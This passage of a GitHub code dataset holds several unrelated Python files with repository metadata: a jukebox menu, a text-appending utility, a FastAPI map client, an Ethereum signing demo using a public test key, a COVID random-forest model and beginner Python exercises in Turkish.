verbose=True)\r\n\r\n\r\npytool.serialclose(serial)\r\n","repo_name":"zhanglixixi/pytool","sub_path":"examples/radar/test_radar_serialMTD.py","file_name":"test_radar_serialMTD.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"2659054993","text":"from jukebox_resources import albums\n\nwhile True:\n print(\"Please choose your album(invalid choice exists). Enter 0 to exit!\")\n for index, (title, artist, year, songs) in enumerate(albums):\n print(\"{}: {}\".format(index+1, title))\n\n choice = int(input())\n if 1<=choice<=len(albums):\n songs_list = albums[choice - 1][3]\n elif choice == 0:\n break\n else:\n continue\n \n print(\"Please Choose a song\")\n for index, (trackNumber, song) in enumerate(songs_list):\n print(\"{}: {}\".format(index+1, song))\n choice = int(input())\n if 1<=choice<=len(songs_list):\n title = songs_list[choice-1][1]\n elif choice==0:\n break\n else:\n continue\n print(\"Playing: {}\".format(title))\n print(\"=\" * 40)\n","repo_name":"shas-hank7/python","sub_path":"03_Lists_Tuples/jukebox.py","file_name":"jukebox.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"36762468796","text":"#!/usr/bin/python3\n\n# ## {R2D2919B742E} ##\n# ###########################################################################\n# What if magic existed?\n# What if a place existed where your every thought and dream come to life.\n# There is only one catch: it has to be written down.\n# Such a place exists, it is called programming.\n# - Scott Taylor Reph, RightThumb.com\n# ###########################################################################\n# ## {C3P0D40fAe8B} ##\n\nimport os\nimport sys\nimport time\n##################################################\nimport _rightThumb._construct as __\nappDBA = __.clearFocus( __name__, __file__ )\n__.appReg = appDBA\ndef focus( parentApp='', childApp='', reg=True ):\n\tglobal appDBA\n\tf = __.appName( appDBA, parentApp, childApp )\n\tif reg:\n\t\t__.appReg = f\n\treturn f\n__.registeredApps.append(focus())\n\n\nimport _rightThumb._base3 as _\n_.load()\n##################################################\nimport _rightThumb._vars as _v\nimport _rightThumb._string as _str\n# import _rightThumb._date as _date\nimport _rightThumb._dir as _dir\n# import _rightThumb._md5 as _md5\n# import _rightThumb._mimetype as _mime\n\n# import _rightThumb._auditCodeBase as _code\n# _code = _.regImp( focus(), '_rightThumb._auditCodeBase' )\n##################################################\nfrom shutil import copyfile\n##################################################\n\ndef appSwitches():\n\t_.switches.register('Input', '-i,-f,-file','file.txt')\n\t_.switches.register('Text', '-text')\n\t_.switches.register('Add', '-a,-add')\n\t_.switches.register('Remove', '-r,-remove')\n\t_.switches.register('Payload', '-payload',';. 0 (ns/be/d/i/f)')\n\n\t\n\n\n_.appInfo[focus()] = {\n\t'file': 'changeTextEnd.py',\n\t'description': 'Add or remove text from the end of the line',\n\t'categories': [\n\t\t\t\t\t\t'json',\n\t\t\t\t\t\t'javascript',\n\t\t\t\t\t\t'programming',\n\t\t\t\t\t\t'text manipulation',\n\t\t\t\t\t\t'file manipulation',\n\t\t\t\t],\n\t'relatedapps': [],\n\t'prerequisite': [],\n\t'examples': [],\n\t'columns': [],\n\t}\n\n_.appData[focus()] = {\n\t'start': time.time(),\n\t'uuid': '',\n\t'audit': [],\n\t'pipe': [],\n\t}\n\n\n# epy replaceText\n# epy insertText\n# epy changeTextEnd\n# epy moveText\n# epy replaceFunction\n\n\n\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p replaceText ?')\n_.appInfo[focus()]['relatedapps'].append('p insertText ?')\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p changeTextEnd ?')\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p moveText ?')\n_.appInfo[focus()]['relatedapps'].append('')\n_.appInfo[focus()]['relatedapps'].append('p replaceFunction ?')\n\n\n\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('p changeTextEnd -i auditCodeBase.json + \";\\'hasClose;\\'\" -text \";c\" -add')\n_.appInfo[focus()]['examples'].append('p changeTextEnd -i auditCodeBase.json + \";\\'hasClose;\\'\" -text \";c\" -remove')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('p f -in *.js + ;. \"function(\" -jn | p line --c - jquery > %tmpf0%')\n_.appInfo[focus()]['examples'].append('type %tmpf0% | p changeTextEnd + ;. \"function(\" -text \";n;t;tfamily.v.tracker.push({\\'action\\';.\\'change\\',\\'function\\';.\\'*_*\\',\\'timestamp\\';.(new Date).getTime(),\\'id\\';.family.talk.thisTable});\" -payload ;. 0 nsif -add ')\n_.appInfo[focus()]['examples'].append('echo shared.js | p changeTextEnd + ;. \"function(\" -text \";n;t;tfamily.v.tracker.push({\\'action\\';.\\'change\\',\\'function\\';.\\'*_*\\',\\'timestamp\\';.(new Date).getTime()});\" -payload ;. 0 nsif -add')\n_.appInfo[focus()]['examples'].append('')\n_.appInfo[focus()]['examples'].append('')\n\n# _.appInfo[focus()]['columns'].append({'name': 'name', 'abbreviation': 'n'})\n\n\n\ndef registerSwitches( argvProcessForce=False ):\n\tglobal appDBA\n\tif not __.appReg == appDBA and appDBA in __.appReg:\n\n\t\tif not __name__ == '__main__':\n\t\t\t_.argvProcess = argvProcessForce\n\t\telse:\n\t\t\t_.argvProcess = True\n\n\t\t_.load()\n\t\t_.appInfo[__.appReg] = _.appInfo[appDBA]\n\t\t_.appData[__.appReg] = _.appData[appDBA]\n\t__.constructRegistration(_.appInfo[__.appReg]['file'],__.appReg)\n\tappSwitches()\n\t_.defaultScriptTriggers()\n\n\t_.switches.trigger('Input',_.myFileLocations)\n\t\t# trigger settings\n\t_.myFileLocation_Print = False\n\n\t# _.switches.trigger('Watched', _.txt2Date)\n\t# _.switches.trigger('Input',_.formatColumns)\n\t_.switches.process()\n\n\n\nif not __name__ == '__main__':\n\t_.argvProcess = False\nelse:\n\t_.argvProcess = True\n\nregisterSwitches()\n\n\n\ndef fieldSet( switchName, switchField, switchValue, theFocus=False ):\n\tif not type( theFocus ) == bool:\n\t\ttheFocus = theFocus\n\t_.switches.fieldSet( switchName, switchField, switchValue, theFocus )\n\ndef setPipeData(data):\n\t# _.appData[__.appReg]['pipe'] = list(data)\n\tif len(data) > 0:\n\t\t_.appData[__.appReg]['pipe'] = []\n\t\tfor pd in data:\n\t\t\tpd = pd.replace('\\n','')\n\t\t\tif not pd == '':\n\t\t\t\t_.appData[__.appReg]['pipe'].append(pd)\n\ndef pipeCleaner():\n\tif len( _.appData[__.appReg]['pipe'] ):\n\t\tif type( _.appData[__.appReg]['pipe'][0] ) == str:\n\t\t\tif not _.appData[__.appReg]['pipe'][0][0] in _str.safeChar:\n\t\t\t\t_.appData[__.appReg]['pipe'][0] = _.appData[__.appReg]['pipe'][0][1:]\n\t\t\tfor i,pipeData in enumerate(_.appData[__.appReg]['pipe']):\n\t\t\t\t_.appData[__.appReg]['pipe'][i] = _.appData[__.appReg]['pipe'][i].replace('\\n','')\n\n\n\n_.appData[__.appReg]['pipe'] = False\nif not sys.stdin.isatty():\n\tsetPipeData( sys.stdin.readlines() )\n\t# _.appData[__.appReg]['pipe'] = sys.stdin.readlines()\n\t# pipeCleaner()\n\n\n\n########################################################################################\n# START\n\nfileBackup = _.regImp( __.appReg, 'fileBackup' )\n# fileBackup.switch( 'Silent' )\nfileBackup.switch( 'isRunOnce' )\nfileBackup.switch( 'DoNotSchedule' )\nfileBackup.switch( 'Flag', 'changeTextEnd' )\ntheText = ''\ndef action():\n\tglobal theText\n\n\t# _.pr( _.switches.value('Input') )\n\n\tif _.switches.isActive('Text'):\n\t\t\n\t\ttheText = _.ci(_.switches.value('Text'))\n\t\ttheText = _str.cleanBE( theText, ' ' )\n\n\tif len(_.switches.value('Plus'))<3:\n\t\t_.pr( 'Error: Plus' )\n\t\tsys.exit()\n\n\tif not type( _.appData[__.appReg]['pipe'] ) == bool or _.switches.isActive('Input') and os.path.isfile( _.switches.value('Input') ):\n\t\tif type( _.appData[__.appReg]['pipe'] ) == bool:\n\t\t\t_.appData[__.appReg]['pipe'] = []\n\t\t\t_.appData[__.appReg]['pipe'].append( _.switches.value('Input') )\n\t\t\n\t\tfiles = _.appData[__.appReg]['pipe']\n\t\tfor filename in files:\n\t\t\tif os.path.isfile( filename ):\n\t\t\t\tprocessFile(filename)\n\n\n\ndef getTabs( line ):\n\tpre = ''\n\tfor ch in str(line):\n\t\tif ch == ' ' or ch == '\\t':\n\t\t\tpre += ch\n\t\telse:\n\t\t\treturn pre\n\treturn pre\n\ndef processFile( filename ):\n\tglobal theText\n\n\t_.pr()\n\t_.pr('processing:', filename)\n\tfileBackup.switch( 'Input', filename )\n\tfileBackup.switch( 'Flag', 'pre changeTextEnd' )\n\trecoveryFile = fileBackup.do( 'action' )\n\n\tfile = _.getText( filename, raw=True )\n\n\tnewFile = []\n\trows = []\n\t\n\n\tif _.switches.isActive('Payload'):\n\t\tpayload = _.switches.value('Payload').split( ',' )\n\t\tnospace = False\n\t\tbe = False\n\t\tdup = False\n\t\taddi = False\n\t\taddf = False\n\t\tfor ii,p in enumerate(payload):\n\t\t\tpayload[ii] = _.ci( payload[ii] )\n\t\t\tif ii == 0:\n\t\t\t\tdelim = payload[ii]\n\t\t\telif ii == 1:\n\t\t\t\trow = int(payload[ii])\n\t\t\telif ii == 2:\n\t\t\t\tif 'n' in payload[ii].lower() and 's' in payload[ii].lower():\n\t\t\t\t\tnospace = True\n\t\t\t\tif 'b' in payload[ii].lower() and 'e' in payload[ii].lower():\n\t\t\t\t\tbe = True\n\t\t\t\tif 'd' in payload[ii].lower():\n\t\t\t\t\tdup = True\n\t\t\t\tif 'i' in payload[ii].lower():\n\t\t\t\t\taddi = True\n\t\t\t\tif 'f' in payload[ii].lower():\n\t\t\t\t\taddf = True\n\t\t\t\t\tf_info = _dir.fileInfo( filename )['name']\n\n\tnewText = theText\n\tfor i,line in enumerate(file.split('\\n')):\n\t\tline = line.replace( '\\n', '' )\n\t\tfound = False\n\t\tif _.showLine(line):\n\t\t\tfound = True\n\n\t\t\tif _.switches.isActive('Add'):\n\t\t\t\tif _.switches.isActive('Payload'):\n\t\t\t\t\t# _.pr()\n\t\t\t\t\t# _.pr(line)\n\t\t\t\t\tpayloadData = line.split( delim )[ row ]\n\t\t\t\t\t# _.pr(payloadData)\n\t\t\t\t\tif dup:\n\t\t\t\t\t\tpayloadData = _str.replaceDuplicate( payloadData, ' ' )\n\t\t\t\t\t\tpayloadData = _str.replaceDuplicate( payloadData, '\\t' )\n\t\t\t\t\tif be:\n\t\t\t\t\t\tpayloadData = _str.cleanBE( payloadData, ' ' )\n\t\t\t\t\t\tpayloadData = _str.cleanBE( payloadData, '\\t' )\n\t\t\t\t\tif nospace:\n\t\t\t\t\t\tpayloadData = payloadData.replace( ' ', '' )\n\t\t\t\t\t\tpayloadData = payloadData.replace( '\\t', '' )\n\t\t\t\t\tpass\n\t\t\t\t\tif addf:\n\t\t\t\t\t\tpayloadData += '[' + str( f_info ) + ']'\n\t\t\t\t\tif addi:\n\t\t\t\t\t\tpayloadData += '(' + str( i ) + ')'\n\t\t\t\t\tnewText = theText.replace( '*_*', payloadData )\n\t\t\t\t\tpayloadData = ''\n\n\n\t\t\t\tnewFile.append( line + newText )\n\n\n\t\t\t# pass\n\n\t\t\t\t\t\n\t\t\tif _.switches.isActive('Remove'):\n\t\t\t\tline = _str.cleanEnd( line, ' ' )\n\t\t\t\tline = _str.cleanEnd( line, '\\t' )\n\t\t\t\tline = _str.cleanEnd( line, theText )\n\t\t\t\tnewFile.append( line )\n\n\t\tif not found:\n\t\t\tnewFile.append( line )\n\n\t_.saveText( newFile, filename )\n\n\tfileBackup.switch( 'Input', filename )\n\tfileBackup.switch( 'Flag', 'changeTextEnd' )\n\trecoveryFile = fileBackup.do( 'action' )\n\n\tif _.switches.isActive('Input'):\n\n\t\tkeep=input('Keep changes? ')\n\t\tif 'n' in keep.lower():\n\t\t\ttry:\n\t\t\t\tcopyfile(recoveryFile, filename)\n\t\t\t\t_.pr( 'Undo successful' )\n\t\t\texcept Exception as e:\n\t\t\t\t_.pr( 'Undo fail' )\n\n# type %tmpf0% | p changeTextEnd + ;. \"function(\" -text \";n;t;tfamily.v.tracker.push({'action';.'change','function';.'*_*','timestamp';.(new Date).getTime(),'id';.family.talk.thisTable,'d';.family.talk.adherence.r_d(),'a';.family.talk.adherence.r_a()});\" -payload ;. 0 nsif -add - setTimeout\n\n########################################################################################\nif __name__ == '__main__':\n\taction()\n\n\n\n\n\n\n\n","repo_name":"rightthumb/rightthumb-widgets-v0","sub_path":"widgets/python/changeTextEnd.py","file_name":"changeTextEnd.py","file_ext":"py","file_size_in_byte":9686,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"34"} +{"seq_id":"7737191","text":"from typing import Optional\n\nfrom fastapi import FastAPI, HTTPException, Query\nfrom fastapi.middleware.cors import CORSMiddleware\n\nfrom didmap_api.enums.filters import Filters\nfrom didmap_api.enums.map_types import MapTypes\nfrom didmap_api.enums.game_types import GameTypes\nfrom didmap_api.rdf_utils.collection_graph import CollectionGraph\nfrom didmap_api.rdf_utils.map_graph import MapGraph\n\n\napp = FastAPI(\n title=\"Didmap API client\",\n description=\"Unofficial Python API client for https://mapasinteractivos.didactalia.net\",\n version=\"1.0.0\",\n)\n\n\norigins = ['*']\n\napp.add_middleware(\n CORSMiddleware,\n allow_origins=origins,\n allow_credentials=True,\n allow_methods=[\"GET\"],\n allow_headers=[\"*\"],\n)\n\n\n@app.get(\"/mapcollection/\")\nasync def get_collection(\n map_type: MapTypes,\n continent: Optional[str] = None,\n country: Optional[str] = None,\n region: Optional[str] = None,\n game_type: Optional[GameTypes] = None,\n):\n \"\"\"\n Retrives info about several Didactalia's interactive maps based on the query parameters provided\n \"\"\"\n filters = [\n (Filters.map_type, map_type),\n (Filters.continent, continent),\n (Filters.country, country),\n (Filters.region, region),\n (Filters.game_type, game_type),\n ]\n\n coll = CollectionGraph()\n coll.load_collection(filters)\n\n if (coll.query_collection()):\n return { \"url\": coll.url, \"results\": len(coll.maps), \"data\": coll.maps }\n else:\n raise HTTPException(status_code=404, detail=\"Could not find the collection\")\n\n\n@app.get(\"/map/\")\nasync def get_map(map_path: str = Query(..., description=\"Example path: 'physical-relief-of-central-america/0f6c3cbb-5c17-4c8f-b3c1-f9238bea0e81'\")):\n \"\"\"Get info about a Didactalia's interactive map\"\"\"\n map_graph = MapGraph()\n map_graph.load_map_ressource(map_path)\n\n if (map_graph.query_map_ressource()):\n return map_graph.map_info\n else:\n raise HTTPException(status_code=404, detail=\"Could not find the collection\")","repo_name":"jblanper/didmap-client-back","sub_path":"didmap_api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"13547109794","text":"#encoding=UTF-8\nimport rlp\nfrom rlp.sedes import big_endian_int, Binary, binary\nfrom eth_rlp import HashableRLP\nfrom eth_utils.curried import keccak\nfrom hexbytes import HexBytes\nfrom eth_account import Account\nfrom web3 import Web3\n\n\nclass LegacyTransaction(HashableRLP):\n fields = (\n ('nonce', big_endian_int),\n ('gasPrice', big_endian_int),\n ('gas', big_endian_int),\n ('to', Binary.fixed_length(20, allow_empty=True)),\n ('value', big_endian_int),\n ('data', binary),\n )\n\n\nclass Transaction(HashableRLP):\n fields = (\n ('nonce', big_endian_int),\n ('gasPrice', big_endian_int),\n ('gas', big_endian_int),\n ('to', Binary.fixed_length(20, allow_empty=True)),\n ('value', big_endian_int),\n ('data', binary),\n ('v', big_endian_int),\n ('r', big_endian_int),\n ('s', big_endian_int),\n )\n\n\ndef sign_legacy_tx():\n tx = {\n \"to\": HexBytes(\"0x3535353535353535353535353535353535353535\"),\n \"value\": 1000000000000000000,\n \"nonce\": 9,\n \"gas\": 21000,\n \"gasPrice\": 20000000000,\n \"data\": b\"\",\n }\n encoded_tx = LegacyTransaction.from_dict(tx)\n print(\"rlp encode result:\", rlp.encode(encoded_tx).hex())\n\n signing_hash = encoded_tx.hash()\n print(\"signing msg hash:\", signing_hash.hex())\n\n key_obj = eth_key_obj(private_key=\"4646464646464646464646464646464646464646464646464646464646464646\")\n\n result = key_obj.sign_msg_hash(signing_hash)\n print_sign_result(result)\n\n\ndef sign_normal_tx():\n tx = {\n \"to\": HexBytes(\"0x3535353535353535353535353535353535353535\"),\n \"value\": 1000000000000000000,\n \"nonce\": 9,\n \"gas\": 21000,\n \"gasPrice\": 20000000000,\n \"data\": b\"\",\n \"v\": 1,\n \"r\": 0,\n \"s\": 0,\n }\n sign_155_tx(tx)\n\n\ndef sign_155_tx(transaction):\n print(transaction)\n encoded_tx = Transaction.from_dict(transaction)\n\n print(rlp.encode(encoded_tx).hex())\n print(encoded_tx.hash().hex())\n\n\n private_key = \"4646464646464646464646464646464646464646464646464646464646464646\"\n acct = Account.from_key(private_key)\n print(\"address:\", acct.address)\n # signed_result = acct.signHash(\"0xdaf5a779ae972f972197303d7b574746c7ef83eadac0f2791ad23db92e4c8e53\")\n signed_result = acct.sign_msg_hash(\"0xdaf5a779ae972f972197303d7b574746c7ef83eadac0f2791ad23db92e4c8e53\")\n print(\"r: \", signed_result.r)\n print(\"s: \", signed_result.s)\n\n transaction[\"r\"] = signed_result.r\n transaction[\"s\"] = signed_result.s\n transaction[\"v\"] = 37\n\n print(transaction)\n encoded_signed_tx = Transaction.from_dict(transaction)\n\n raw_tx = rlp.encode(encoded_signed_tx).hex()\n print(raw_tx)\n\n sender = Account.recover_transaction(raw_tx)\n print(\"sender: \", sender)\n\n\ndef eth_key_obj(private_key=\"\"):\n acct = Account.from_key(private_key)\n key_obj = acct._key_obj\n return key_obj\n\n\ndef print_sign_result(result):\n \"\"\"\n 打印签名结果\n \"\"\"\n print(\"v: \", result.v)\n print(\"r: \", result.r)\n print(\"s: \", result.s)\n print(\"signature: \", result)\n\n\ndef test_sign_hash():\n \"\"\"\n 签名哈希\n \"\"\"\n key_obj = eth_key_obj()\n\n # signing_hash = \"dd54f25d0bbeae343a1dec3acce8dc5b3a0886bdb9c5e667f65d5bbbe11bc093\"\n signing_hash = \"22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\"\n\n result = key_obj.sign_msg_hash(HexBytes(signing_hash))\n print_sign_result(result)\n\n\ndef test_sign_msg():\n \"\"\"\n 签名msg本身\n \"\"\"\n key_obj = eth_key_obj()\n\n # message = \"I will pay Bob 1 ETH.\"\n message = \"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\"\n # message = \"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a\"\n\n # 添加固定前缀\n total_msg = \"\\x19Ethereum Signed Message:\\n\" + str(len(message)) + message\n\n singing_msg = Web3.toBytes(text=total_msg)\n\n result = key_obj.sign_msg(singing_msg)\n print_sign_result(result)\n\n\ndef test_sign_msg_hash():\n \"\"\"\n 签名msg哈希\n \"\"\"\n key_obj = eth_key_obj()\n\n message = \"I will pay Bob 1 ETH.\"\n msg_hash = keccak(text=message)\n # print(msg_hash.hex())\n\n msg_hash = Web3.toBytes(hexstr=\"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\")\n\n singing_msg = Web3.toBytes(text=\"\\x19Ethereum Signed Message:\\n32\") + msg_hash\n sig_msg_hash = keccak(singing_msg)\n # sig_msg_hash = Web3.toBytes(hexstr=\"0x22658f1dab0720e8bf599551cc6dd75230ed4efefc7f6694f0b389e0807a0e52\")\n\n result = key_obj.sign_msg_hash(sig_msg_hash)\n print_sign_result(result)\n\n\ndef main():\n sign_legacy_tx()\n # sign_normal_tx()\n # test_sign_hash()\n # test_sign_msg()\n # test_sign_msg_hash()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"zhwindy/blockchain-bot","sub_path":"tools/signature.py","file_name":"signature.py","file_ext":"py","file_size_in_byte":4768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"29653842433","text":"# Load TF-DF\nimport tensorflow_decision_forests as tfdf\nimport pandas as pd\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nimport matplotlib.pyplot as plt\nimport math\n\ntask = tfdf.keras.Task.CLASSIFICATION\nmodel = tfdf.keras.RandomForestModel(task=task)\ntarget = \"OBITO\"\nporcentagem_obito = 0\n\n\ndef train():\n # Load a dataset in a Pandas dataframe.\n df = pd.read_csv('datasets/COVID.CSV', sep=';')\n # cols_to_drop = [\"DATE_DIED\"]\n cols_to_drop = [\"SEX\", \"RENAL_CHRONIC\", \"CARDIOVASCULAR\", \"ASTHMA\",\n \"OTHER_DISEASE\", \"COPD\", \"INMSUPR\", \"DATE_DIED\", \"TOBACCO\",\n \"PREGNANT\", \"USMER\", \"DIABETES\", \"HIPERTENSION\"]\n\n df = df.drop(columns=cols_to_drop)\n\n # drop all dolumns with 97 and 99\n df['CLASIFFICATION_FINAL'] = np.where(df['CLASIFFICATION_FINAL'] > 3, 2, 1)\n for label in df.head():\n df = df[df[label] != 97]\n df = df[df[label] != 99]\n if (label != \"AGE\"):\n df[label] = np.where(df[label] == 2, 0, 1)\n\n df_died = df[(df.OBITO == 1)]\n\n porcentagem_obito = (len(df_died)/len(df)) * 100\n\n fig, axs = plt.subplots(2, 2)\n axs[0, 0].hist(df.AGE, 15, rwidth=0.9)\n axs[0, 0].hist(df_died.AGE, 15, rwidth=0.9)\n axs[0, 0].grid(axis='y', alpha=0.75)\n axs[0, 0].set_title(\"Idade\")\n\n axs[1, 0].hist(df.CLASIFFICATION_FINAL, 2,\n rwidth=0.9, orientation=\"horizontal\")\n axs[1, 0].hist(df_died.CLASIFFICATION_FINAL, 2,\n rwidth=0.9, orientation=\"horizontal\")\n axs[1, 0].grid(axis='x', alpha=0.75)\n axs[1, 0].set_title(\"Resultado de teste para COVID\")\n\n axs[0, 1].hist(df.PNEUMONIA, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[0, 1].hist(df_died.PNEUMONIA, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[0, 1].grid(axis='x', alpha=0.75)\n axs[0, 1].set_title(\"Pacientes com pneumonia\")\n\n axs[1, 1].hist(df.INTUBED, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[1, 1].hist(df_died.INTUBED, 2, rwidth=0.9, orientation=\"horizontal\")\n axs[1, 1].grid(axis='x', alpha=0.75)\n axs[1, 1].set_title(\"Pacientes que foram entubados\")\n fig.show()\n\n train_df, test_df = train_test_split(df, test_size=0.2,\n random_state=42,\n shuffle=True)\n\n # Convert the dataset into a TensorFlow dataset.\n\n train_ds = tfdf.keras.pd_dataframe_to_tf_dataset(\n train_df, label=target, task=task)\n test_ds = tfdf.keras.pd_dataframe_to_tf_dataset(\n test_df, label=target, task=task)\n\n # Train a Random Forest model.\n\n # optional step - add evaluation metrics\n model.compile(metrics=[\"mse\", \"mape\", \"accuracy\"])\n\n model.fit(train_ds)\n\n # Evaluate the model.\n evaluation = model.evaluate(test_ds, return_dict=True)\n\n print(evaluation)\n print(f\"MSE: {evaluation['mse']:.2f}\")\n print(f\"RMSE: {math.sqrt(evaluation['mse']):.2f}\")\n print(f\"MAPE: {evaluation['mape']:.2f}\")\n print(f\"accuracy: {evaluation['accuracy']:.2f}\")\n\n # Export the model to a SavedModel.\n\n\ndef model_info():\n # Summary of the model structure.\n print(\"plotting summary\")\n model.summary()\n\n # plot the first tree, restricted to depth of 3\n print(\"plotting tree\")\n html = tfdf.model_plotter.plot_model(model, tree_idx=0, max_depth=15)\n\n output_file = open('index.html', 'w')\n output_file.write(html)\n output_file.close()\n\n # print(\"plotting graphic\")\n # model.make_inspector().features()\n # model.make_inspector().evaluation()\n\n inspector = model.make_inspector()\n print(\"Model type:\", inspector.model_type())\n\n print(\"Number of trees:\", inspector.num_trees())\n print(\"Objective:\", inspector.objective())\n print(\"Input features:\", inspector.features())\n\n inspector.evaluation()\n\n print(f\"Available variable importances:\")\n for importance in inspector.variable_importances().keys():\n print(\"\\t\", importance)\n # inspector.variable_importances()[\"SUM_SCORE\"]\n\n logs = inspector.training_logs()\n\n plt.figure(figsize=(12, 4))\n\n # Mean decrease in AUC of the class 1 vs the others.\n variable_importances = inspector.variable_importances()[\"SUM_SCORE\"]\n\n # Extract the feature name and importance values.\n #\n # `variable_importances` is a list of tuples.\n feature_names = [vi[0].name for vi in variable_importances]\n feature_importances = [vi[1] for vi in variable_importances]\n # The feature are ordered in decreasing importance value.\n feature_ranks = range(len(feature_names))\n\n bar = plt.barh(feature_ranks, feature_importances,\n label=[str(x) for x in feature_ranks])\n plt.yticks(feature_ranks, feature_names)\n plt.gca().invert_yaxis()\n\n # TODO: Replace with \"plt.bar_label()\" when available.\n # Label each bar with values\n for importance, patch in zip(feature_importances, bar.patches):\n plt.text(patch.get_x() + patch.get_width(),\n patch.get_y(), f\"{importance:.4f}\", va=\"top\")\n\n plt.xlabel(\"SUM_SCORE\")\n plt.title(\"Soma do score de cada variável\")\n plt.tight_layout()\n plt.show()\n\n # explain the model's predictions using SHAP\n\n plt.figure(figsize=(12, 4))\n\n plt.plot([log.num_trees for log in logs], [\n log.evaluation.rmse for log in logs])\n plt.xlabel(\"Number of trees\")\n plt.ylabel(\"RMSE (out-of-bag)\")\n plt.title(\"RMSE vs number of trees\")\n\n plt.show()\n\n\ntrain()\nmodel_info()\n","repo_name":"brendoLoR/decision_tree_covid","sub_path":"tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":5548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38787385041","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Veri Tipi Değiştirme \n\n# In[ ]:\n\n\na = \"5\"\nb= 10\nprint(\"Sayi toplam : \",int(a)+b)\nprint(\"String Toplam : \",a+str(b))\n\n\n# # LİSTE KOMUTLARI \n\n# In[ ]:\n\n\nliste=[1,5,2,3,4]\nprint(\"Uzunluk : \",len(liste))\nprint(\"Üçüncü eleman : \",liste[2])\nprint(\"Son eleman : \",liste[-1])\nprint(\"0 dan 2 ye : \",liste[0:3])\nliste.append(9)\nprint(\"9 eklendi : \",liste)\nliste.remove(2)\nprint(\"2 silindi : \",liste)\nliste.sort()\nprint(\"Sirali liste : \",liste)\nliste.insert(2,11)\nprint(\"2. indexe 11 eklendi : \",liste)\nprint(\"kaç 13 var \",liste.count(13))\nprint(\"5 kaçıncı indexte \",liste.index(5))\n\n\n# # DİCTİONARY BASİCS \n\n# In[ ]:\n\n\ning_sozluk = {\"dil\": \"language\", \"bilgisayar\": \"computer\", \"masa\": \"table\"}\nprint(ing_sozluk.keys())\nprint(ing_sozluk.values())\ning_sozluk[\"yellow\"]=\"sarı\"\nprint(ing_sozluk)\n\n\n# In[ ]:\n\n\ning_sözlük = {\"dil\": \"language\", \"bilgisayar\": \"computer\", \"masa\": \"table\"}\n\nsorgu = input(\"Lütfen anlamını öğrenmek istediğiniz kelimeyi yazınız:\")\n\nprint(ing_sözlük.get(sorgu, \"Bu kelime veritabanımızda yoktur!\"))\n\n\n# # TUPLE \n\n# In[ ]:\n\n\nt = (1,2,3,3,4,5,6)\na = 1,2,3,4,5,6\nprint(\"a nin tipi : \",type(a))\nt.count(3)\n\n\n# # Hesap Makinesi \n\n# In[ ]:\n\n\na=int(input(\"1. sayiyi giriniz : \"))\nb=int(input(\"2. sayiyi giriniz : \"))\n\nprint(\"İslem Seçiniz\")\nprint(\"1 = Toplama\")\nprint(\"2 = Çıkarma\")\nprint(\"3 = Çarpma\")\nprint(\"4 = Bölme\")\n\nislem=int(input(\"İslem Seçiniz : \"))\n\nif islem ==1:\n sonuc=a+b\n print(\"{} ve {} nın toplamı = \".format(a,b),sonuc)\nelif islem ==2:\n sonuc=a-b\n print(\"{} ve {} nın farkı = \".format(a,b),sonuc)\nelif islem ==3:\n sonuc=a*b\n print(\"{} ve {} nın çarpımı = \".format(a,b),sonuc)\nelif islem ==4:\n sonuc=a/b\n print(\"{} ve {} nın bölümü = \".format(a,b),sonuc)\nelse:\n print(\"Geçerli işlem giriniz !!! \")\n\n\n# # Faktoriyel \n\n# In[ ]:\n\n\nx=int(input(\"Sayi giriniz : \"))\n\nfaktoriyel=1\n\nfor i in range(faktoriyel,x+1):\n faktoriyel=faktoriyel*i\nprint(\"Faktoriyel : \",faktoriyel)\n\n\n# # Maxi Bulma \n\n# In[ ]:\n\n\nliste2=[1,5,9,2354,123456,213246,2222,200,985]\n\nmaxi=-10000000000\nfor each in liste2:\n if(each>maxi):\n maxi=each\n else:\n continue\nprint(maxi)\n\n\n# # TOPLAM \n\n# In[ ]:\n\n\na=int(input(\"Sayi giriniz : \"))\nb=int(input(\"Sayi giriniz : \"))\nc=int(input(\"Sayi giriniz : \"))\n\nliste=[a,b,c]\n\ntoplam=0\n\nfor each in liste:\n toplam=toplam+each\n \nprint(toplam)\n\n\n# # YÜZYIL HESAPLAMA\n\n# In[ ]:\n\n\nyil=int(input(\"Yil giriniz : \"))\n\nstr_yil=str(yil)\n\nif (len(str_yil)<3):\n yy=1\n print(\"Yüzyıl\",yy)\nelif (len(str_yil)==3):\n yy=int(str_yil[0])+1\n print(\"Yüzyıl : \",yy)\nelif (len(str_yil)==4):\n yy=int(str_yil[0:2])+1\n print(\"Yüzyıl\",yy)\nelse:\n print(\"Geçeri değer giriniz \")\n\n\n# # WHİLE \n\n# In[ 